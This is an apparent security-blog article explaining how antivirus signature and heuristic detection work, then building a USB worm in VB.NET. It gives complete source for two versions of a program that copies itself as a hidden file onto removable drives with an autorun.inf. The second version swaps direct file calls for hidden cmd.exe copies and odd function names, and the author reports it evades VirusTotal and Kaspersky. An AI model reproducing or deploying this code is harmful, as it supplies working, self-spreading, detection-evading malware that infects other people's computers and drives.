Hacking

Antivirus Evasion: The Making of a Full, Undetectable USB Dropper / Spreader

Soufiane Tahiri
September 20, 2012 by
Soufiane Tahiri

Some Basics and Overview

Usually when we talk about bypassing antivirus software, and especially when we talk about antivirus programs like NOD32, Kaspersky, BitDefender… We automatically think about deep coding knowledge, using undocumented APIs or using Zero days exploits, but this is not always true, since by applying some "very" basics approaches we will be able to bypass most of (if not all) antivirus programs, at least for doing some basic things.

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

Basically, all antivirus programs detect malicious files the same way, either by checking for a digital signature inside of the files (which explains the importance of keeping your antivirus up to date) or by a technique called heuristic detection. This (and of course other criteria) usually makes the difference between a good and a bad antivirus.

Signature detection

Technically when an antivirus starts looking for a signature, it looks for "string(s)" found by Antivirus research labs and considered as a fingerprint that a malicious program code may have. Every single virus, worm, or any other malware has its own signature, and considering the fact that there are billions of malicious files in the world, and there are more and more malware developers, looking for a specific signature becomes almost impossible, so Antivirus labs and malware analysts start to give a kind of generic signature to help find a type of malicious program, and not the "one by one" way.

Even using generic signatures, this detection mode is still archaic due to the diversity of ways to protect malware from being detected. Complex packers, custom encryption or polymorphism make this way of detection not 100% reliable, especially when it comes to detecting totally new viruses or very complex ones.

Heuristic detection

Almost all recent antivirus software have a heuristic detection mode which consists (in a very simple way) to simulate a file execution, then monitoring if this file performs any suspicious activities like replication, file injection, file downloading or hiding files from the explorer. This is quite clever, but may lead to generate lot of false positive detections since heuristic analysis is a kind of multi-criteria analysis based in most cases on "already known" codes, classes, methods, functions or some commands that are not usually implemented in widely used programs. This may be considered as a kind of weakness that would, and will be, exploited (later in this article) to avoid detection by this way of analysis, since at this stage, bypassing heuristic analysis is bypassing the whole antivirus because every "fully" new coded malware is totally unknown by the antivirus and will not be detectable instantly via a digital signature.

The problem is not coding a harmful program; the real problem is spreading it out! As known, the aim of any malicious program coder is to infect or take the control of the largest number possible of computers, and this cannot be done manually, so almost every virus, worm, botnet, etc. has one or more ways to propagate implemented as functionality! And one of the most common modes used is self-spreading via removable disks like USB flash drives.

The idea is quite simple: the malware will check periodically for removable disks (USB keys, memory cards, and even some external hard drives). If found, it will copy itself (replication of the original malware) on it / them under an appealing name or under a random one, but hides itself from the explorer by changing the file attributes, and will create an Autorun.inf file which will run the replication mode every time this removable disk is plugged into a computer.

Our Main Goal

For every new generation of Antivirus software, this behavior will be flagged as suspicious or malicious behavior and will be detected in most of cases as Trojan horse Dropper.Generic, Trojan.Generic or something similar!

We will see how we can make a fully undetectable USB spreader, without any obfuscation or encryption, just by making the same thing the way Kaspersky's heuristic analysis does not consider as "malicious behavior".

I'll use VirusTotal to analyze generated files (even if it's not important since our program is not really harmful) and all upcoming tests are made under Windows 7 Ultimate with the trial version of Kaspersky Internet Security 11.0.2.556 installed.

All codes are in VB.NET using Frameworks 4, which is an uncommon language for coding malicious stuff, but it's wise to say that some serious worms, viruses and remote administration tools were done using VB, VB.net or VBscript.
Anyway, let's make a USB dropper "the normal way" and see how it's seen by VirusTotal and Kaspersky's heuristic analysis.

The Game

Let's start by making a basic USB spreader. If you want to make tests, just create a new project under Microsoft Visual Studio, and make sure you import System.Threading and System.IO then copy and paste this code:

Imports System.Threading

Imports System.IO

Public

Class

Form1


Shared ReplicatedName As

String = "USBsetup.exe"


Private

Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles

MyBase.Load

StartUSBspreading()


End

Sub


Sub StartUSBspreading()


Try


Do


Dim Alldrives() As

DriveInfo = DriveInfo.GetDrives()


For

Each DriveFound As

DriveInfo

In Alldrives


If DriveFound.DriveType = "2"

And DriveFound.IsReady = True

Then

System.IO.File.Copy(Application.ExecutablePath, DriveFound.RootDirectory.ToString & ReplicatedName, True)


File.SetAttributes(DriveFound.RootDirectory.ToString & ReplicatedName, FileAttributes.Hidden)

AutorunMaker(DriveFound)


End

If


Next DriveFound


Thread.Sleep(6000)


Loop


Catch ex As

Exception


End

Try


End

Sub


Public

Shared

Sub AutorunMaker(ByVal driveFound As

DriveInfo)


Try


File.Delete(Convert.ToString(driveFound.RootDirectory) & "autorun.inf")


Dim AutorunStreamWriter As

New

StreamWriter(Convert.ToString(driveFound.RootDirectory) & "autorun.inf")

AutorunStreamWriter.WriteLine("[autorun]")

AutorunStreamWriter.WriteLine("shellexecute=" & ReplicatedName)

AutorunStreamWriter.Flush()

AutorunStreamWriter.Close()


File.SetAttributes(Convert.ToString(driveFound.RootDirectory) & "autorun.inf", FileAttributes.Hidden)


Catch ex As

Exception


End

Try


End

Sub

End

Class

Instead of using direct APIs like WM_DEVICECHANGE that get you notified about hardware device changes, and to avoid the use of controls like timers, usually malicious programs coders use infinite loops looking for removable disks, and that sleep for seconds, just like what happens in this case. On program load, StartUSBspreading() is called and it gets all detected drives, then it looks only for removable ones. If the drive found is ready, the program makes a replication of itself and an aurotun.inf file that will load the replicated file, and hides both of the newly made files.

VirusTotal did not return real useful information since it makes just a static analysis:

File name:    MyTestApp.exe

Detection ratio:     1 / 42

Antivirus Result Update

Jiangmin Trojan/Generic.niew 20120904

Kaspersky - 20120904

https://www.virustotal.com/file/497571ba2d8a51ae4a3f7ce3a9746fef3563bd18ed4cf126d4b1b34d4bcdcf9f/analysis/1346767444

With a detection ratio of 1/42 we may say that we have already an interesting achievement, but when running a heuristic analysis of Kaspersky it detects our program, which has no digital signature, as high risk program and neutralizes the threat.

Figure 1 Behavior similar to PDM.Trojan.generic detected

At this stage we can consider several changes on our code that may lead to decreased detection rate, like using classes and modules, but one of the most powerful – and easiest – techniques is renaming as many functions, subs and events used as possible. We said that heuristic analysis is based on already known stuff, and almost all malicious programs do the same things like damaging your computer, stealing personal data or spying on your activities … and most of these aims are reached using some common piece of codes, for example to make a keylogger, you will probably use APIs like SetWindowsHookEx and events like Hook_Keyboard(), and by changing subs and functions names to some common ones (like BooksManagers(), Baby, Chat_System(), etc.) malicious coders reach an unexpected detection ratio! Renaming already known functions and subs can actually decrease detection ratio very considerably.

Our sample is just a few lines of code, and renaming subs will not bypass Kaspersky. Let's think about this a second, our objective is clear: making a replication of our program and an Autorun.inf file in any plugged removable disk.

Instead of using suspicious methods like File.Copy() and File.Delete(), we can possibly make Kaspersky and most antivirus programs believe that it's the user who copied or deleted files by using another intermediary program that requires almost no privilege, which is Windows CMD command line (executable cmd.exe).

By invoking the Windows command silently, we can do everything that could be done via the command line without any restrictions!

We can make a thread that creates the autorun.inf file temporarily somewhere in the user's system folder and another thread that checks for the presence of plugged removable disks and makes copy tasks via hidden instances of command line.

This may seems strange, but after some tests I made, using weird names for functions, procedures, and methods may also help decrease the detection ratio.

Here is the new code for our USB dropper:

Imports System.Threading

Imports System.IO

Public

Class

Form1


Dim MyPogramPath As

String = Application.ExecutablePath


Dim MyAutPath As

String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "microsoftautorun.inf"


Dim mo As

New

Thread(AddressOf makdeotrn)


Dim k1 As

New

Thread(AddressOf kaynaChiKle)


Sub OnchorhaWalakal2ajr(ByVal d As

String)


Try


If

Not IO.File.Exists(d & "Flash_Update.exe") Then


Dim Proc As

New

Process()

Proc.StartInfo.FileName = "cmd.exe"

Proc.StartInfo.Arguments = "/c copy " & """" & MyPogramPath & """" & " " & """" & d & "Flash_Update.exe"

Proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden

Proc.StartInfo.CreateNoWindow = False

Proc.Start()

Proc.WaitForExit()

Proc.Close()


FileSystem.SetAttr(d & "Flash_Update.exe", FileAttribute.Hidden)


End

If


Catch ex As

Exception


End

Try


End

Sub


Sub OnchorhaWalakal2ajr2(ByVal d As

String)


Try


Dim Proc As

New

Process()

Proc.StartInfo.FileName = "cmd.exe"

Proc.StartInfo.Arguments = "/c copy " & """" & MyAutPath & """" & " " & d

Proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden

Proc.StartInfo.CreateNoWindow = False

Proc.Start()

Proc.WaitForExit()

Proc.Close()


FileSystem.SetAttr(d & "autorun.inf", FileAttribute.Hidden)

Catch ex As

Exception

End

Try


End

Sub


Sub kaynaChiKle()

a:


Dim kle() As

DriveInfo = DriveInfo.GetDrives()


For

Each found As

DriveInfo

In kle


If found.DriveType = "2"

And found.IsReady = True

Then


Try

OnchorhaWalakal2ajr2(found.RootDirectory.ToString)

OnchorhaWalakal2ajr(found.RootDirectory.ToString)

Catch ex As

Exception

End

Try


End

If


Next found


GoTo a


End

Sub


Public

Sub MakDeOtrn()


Try


Dim appdata As

String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "microsoft"


Dim sw As

New

StreamWriter(appdata & "autorun.inf")


Dim s As

String = appdata & "autorun.inf"


If IO.File.Exists(s) Then


Try

IO.File.Delete(s)


Catch ex1 As

Exception

End

Try


End

If

sw.WriteLine("[autorun]")

sw.WriteLine("shellexecute=" + "Flash_Update.exe")

sw.Flush()

sw.Close()


Catch ex As

Exception


End

Try


End

Sub


Private

Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles

MyBase.Load

mo.IsBackground = True

mo.Start()

k1.IsBackground = True

k1.Start()


End

Sub

End

Class

Some explanation for the code above:

  1. MakDeOtrn() will make autorun.inf into "C:UsersUserNameAppDataRoamingmicrosoft" designed to run a file called "Flash_Update.exe"
  2. OnchorhaWalakal2ajr (b) checks if the removable disk is not infected yet, if it's true, we set the application that we want to start which is cmd.exe, we set the arguments that are in the command line which will copy the running program (our malicious program) to the removable disk found, under the name "Flash_Update.exe" and of course starts cmd.exe in a hidden window, and wait until the end of copying process to hide the replicated file from the explorer.
  3. OnchorhaWalakal2ajr2 (b) does the same thing as #2 for "autorun.inf"
  4. kaynaChiKle() will check infinitely for the presence of removable disks, if found it calls respectively procedures #3 and #2.
  5. Before testing this new generated program, VirusTotal now considers it as a clean file with a detection ratio of 0/41 as you can see from this link. (www.virustotal.com/file/62254a2968b9a9385a9510431b8023fa2db50b572b6c5d76fdfea0234df8ea03/analysis/1346780514/)

    Scanning our program with Kaspersky reveals absolutely nothing:

    Figure 2 No threat has been detected

    After starting it, our program spreads itself as seen here:


    To Conclude…

    We can make fully undetectable Download and Execute programs, even some silent Download and Install programs and some real silent adwares, and this with absolutely no deep coding knowledge, and the worst is that this simple technique seems to bypass all known antivirus (tested with 5 well known antivirus and further tests are to come), and we can make our spreader even more difficult to detect by encrypting or obfuscating it.

    Complicated things like bypassing antivirus, especially those like Kaspersky, NOD32, BitDefender or AntiVir may not need to be done the complicated way, the example of this USB spreader may let us conclude that as smart as an antivirus and its analysis are, there is always a "simple" way to cheat it.

    Become a Certified Ethical Hacker, guaranteed!

    Become a Certified Ethical Hacker, guaranteed!

    Get training from anywhere to earn your Certified Ethical Hacker (CEH) Certification — backed with an Exam Pass Guarantee.

    Become a Certified Ethical Hacker, guaranteed!

    Become a Certified Ethical Hacker, guaranteed!

    Get training from anywhere to earn your Certified Ethical Hacker (CEH) Certification — backed with an Exam Pass Guarantee.

    References

    • www.msdn.microsoft.com/en-us/library/system.diagnostics.process
    • http://www.symantec.com/connect/ja/articles/heuristic-techniques-av-solutions-overview
    • http://en.wikipedia.org/wiki/Antivirus_software
    • Soufiane Tahiri
      Soufiane Tahiri

      Soufiane Tahiri is is an InfoSec Institute contributor and computer security researcher, specializing in reverse code engineering and software security. He is also founder of www.itsecurity.ma and practiced reversing for more then 8 years. Dynamic and very involved, Soufiane is ready to catch any serious opportunity to be part of a workgroup.

      Contact Soufiane in whatever way works for you:

      Email: soufianetahiri@gmail.com

      Twitter: https://twitter.com/i7s3curi7y

      LinkedIn: http://ma.linkedin.com/in/soufianetahiri

      Website: http://www.itsecurity.ma